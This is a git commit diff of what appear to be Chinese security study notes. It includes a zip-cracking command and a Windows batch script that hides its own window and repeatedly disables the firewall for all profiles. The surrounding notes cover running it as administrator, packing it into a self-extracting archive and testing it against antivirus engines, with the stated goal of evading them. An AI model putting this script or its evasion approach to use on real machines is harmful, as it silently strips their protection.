Compare commits

...

2 Commits

Author SHA1 Message Date
5f3a422c10 08-28-周四_14-35-39 2025-08-28 14:35:39 +08:00
9aa2608c45 update something... 2025-08-28 14:35:25 +08:00
2 changed files with 6 additions and 2 deletions

View File

@@ -248,6 +248,7 @@ fcrackzip -D -p rockyou.txt -u flag.zip
- 桌面上创建一个记事本 - 桌面上创建一个记事本
- 打开计算器 - 打开计算器
- 等待10秒 - 等待10秒
- 需要管理员权限才能运行
```Bash ```Bash
@echo off @echo off
@@ -255,8 +256,7 @@ if "%1"=="h" goto begin
start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin :begin
:loop :loop
netsh advfirewall set publicprofile state off netsh advfirewall set allprofiles state off
netsh advfirewall set privateprofile state off
echo This is a test > %userprofile%\Desktop\testfile.txt echo This is a test > %userprofile%\Desktop\testfile.txt
calc calc
timeout /t 10 timeout /t 10
@@ -283,6 +283,10 @@ goto loop
![img](01.计算机基础知识/1756286349204-36.png) ![img](01.计算机基础知识/1756286349204-36.png)
- 可以在属性中设置,以管理员身份运行
![image-20250828143445926](01.计算机基础知识/image-20250828143445926.png)
- 自解压程序创建好了后可以进行查杀可以看到是8/48有部分杀毒软件是能查出来的比如360。 - 自解压程序创建好了后可以进行查杀可以看到是8/48有部分杀毒软件是能查出来的比如360。
- 想要真正做到免杀,还得后续好好学习呀! - 想要真正做到免杀,还得后续好好学习呀!

Binary file not shown.

After

Width:  |  Height:  |  Size: 84 KiB